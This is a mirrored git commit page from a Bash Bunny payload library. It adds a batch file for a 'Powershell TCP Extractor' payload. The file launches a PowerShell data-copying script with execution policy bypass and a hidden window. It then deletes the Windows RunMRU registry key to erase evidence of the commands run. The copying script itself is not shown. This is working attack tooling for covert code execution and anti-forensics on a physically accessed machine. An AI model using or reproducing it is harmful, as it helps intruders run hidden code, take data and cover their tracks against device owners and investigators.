mirror of
https://github.com/hak5darren/bashbunny-payloads.git
synced 2025-10-29 16:58:12 +00:00
Added PowershellTCPExtractor (#144)
This commit is contained in:
committed by
Sebastian Kinne
parent
19c581613a
commit
fc1d812d96
10
payloads/library/Powershell_TCP_Extractor/d.cmd
Normal file
10
payloads/library/Powershell_TCP_Extractor/d.cmd
Normal file
@@ -0,0 +1,10 @@
|
||||
@echo off
|
||||
|
||||
Rem run powershell script with bypass,nologo, and hidden flag
|
||||
Start "" powershell.exe -ExecutionPolicy Bypass -nologo -WindowStyle Hidden -File %~dp0\copyMoveData.ps1
|
||||
|
||||
REM Delete registry key storing Run dialog history...to clean up evidence
|
||||
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
|
||||
|
||||
@cls
|
||||
@exit
|
||||
Reference in New Issue
Block a user